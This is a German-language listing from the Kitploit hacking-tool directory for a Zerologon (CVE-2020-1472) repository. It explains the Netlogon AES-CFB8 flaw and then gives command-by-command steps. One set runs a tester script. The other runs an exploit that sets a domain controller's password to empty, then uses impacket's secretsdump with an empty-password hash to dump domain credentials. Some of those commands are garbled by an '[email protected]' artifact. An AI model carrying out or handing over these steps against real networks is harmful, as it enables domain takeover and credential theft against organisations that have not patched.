Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-1472 — [CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilegieneskalation (Zerologon) | Kitploit
Tools/GitHubGitHub/murataydemir/cve-2020-1472
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilegieneskalation (Zerologon)

Repository anzeigen
12vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

[CVE-2020-1472] Netlogon-Remoteprotokollaufruf (MS-NRPC) Privilegieneskalation (Zerologon)

Der hier beschriebene Angriff nutzt Schwachstellen in einem kryptografischen Authentifizierungsprotokoll (unsichere Verwendung von AES-CFB8), das die Authentizität und Identität eines in die Domäne eingebundenen Computers gegenüber dem Domänencontroller (DC) nachweist. Durch die falsche Verwendung eines AES-Betriebsmodus ist es möglich, die Identität eines beliebigen Computerkontos (einschließlich der des DC selbst) zu fälschen und für dieses Konto in der Domäne ein leeres Passwort festzulegen (einfach durch Senden einer Reihe von Netlogon-Nachrichten, bei denen verschiedene Felder mit Nullen gefüllt sind). Dies kann dann genutzt werden, um Anmeldedaten des Domänenadministrators zu erhalten und anschließend das ursprüngliche DC-Passwort wiederherzustellen.

So prüfen Sie CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (Beispiel: ./zerologon_tester.py DC01 172.16.208.161)

So nutzen Sie CVE-2020-1472 aus

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (Beispiel: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

Führen Sie dann einen der folgenden Befehle aus

Beispielformat 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Beispielformat 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Bild des PoC

Der ursprüngliche Blogbeitrag ist hier verfügbar
Das ursprüngliche Repository, das das Python-Testskript enthält, ist hier verfügbar
Das ursprüngliche Repository, das das Python-Exploit-Skript enthält, ist hier verfügbar

Tool herunterladen